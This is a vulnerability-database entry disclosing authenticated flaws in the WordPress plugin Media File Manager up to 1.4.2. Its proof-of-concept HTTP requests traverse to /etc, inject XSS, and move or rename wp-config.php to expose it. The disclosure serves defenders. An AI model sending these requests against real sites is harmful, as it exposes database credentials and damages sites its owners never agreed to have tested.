Lucene search

K

Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities

🗓️ 05 Nov 2018 00:00:00Reported by Pasquale TuriType 
wpexploit
 wpexploit
👁 14 Views

Media File Manager <= 1.4.2 Authenticated Multiple Vulnerabilities including directory traversal, reflected XSS, file movement, and file renaming

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
OpenVAS
WordPress Media File Manager Plugin < 1.4.4 Multiple Vulnerabilities
6 Mar 201900:00
openvas
WPVulnDB
Media File Manager <= 1.4.2 - Authenticated Multiple Vulnerabilities
5 Nov 201800:00
wpvulndb
Cvelist
CVE-2018-19042
31 Jan 201919:00
cvelist
Cvelist
CVE-2018-19041
31 Jan 201919:00
cvelist
Cvelist
CVE-2018-19040
31 Jan 201919:00
cvelist
Cvelist
CVE-2018-19043
31 Jan 201919:00
cvelist
Prion
Directory traversal
31 Jan 201919:29
prion
Prion
Design/Logic Flaw
31 Jan 201919:29
prion
Prion
Directory traversal
31 Jan 201919:29
prion
Prion
Directory traversal
31 Jan 201919:29
prion
Rows per page
Diretory Trasversal:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: REDACTED
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Connection: close
Cookie:	REDACTED

action=mrelocator_getdir&dir=../../../../../../../etc

Reflected XSS:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: close
Cookie: REDACTED

action=mrelocator_getdir&dir=[XSS]

Move any file to any dir:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: REDACTED

action=mrelocator_move&dir_from=../../&dir_to=../../../&items=wp-config.php

Rename any file:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/upload.php?page=mrelocator-submenu-handle
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 97
Connection: close
Cookie: REDACTED

action=mrelocator_rename&dir=../../&from=wp-config.php&to=wp-config.txt 

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Nov 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.003
14
.json
Report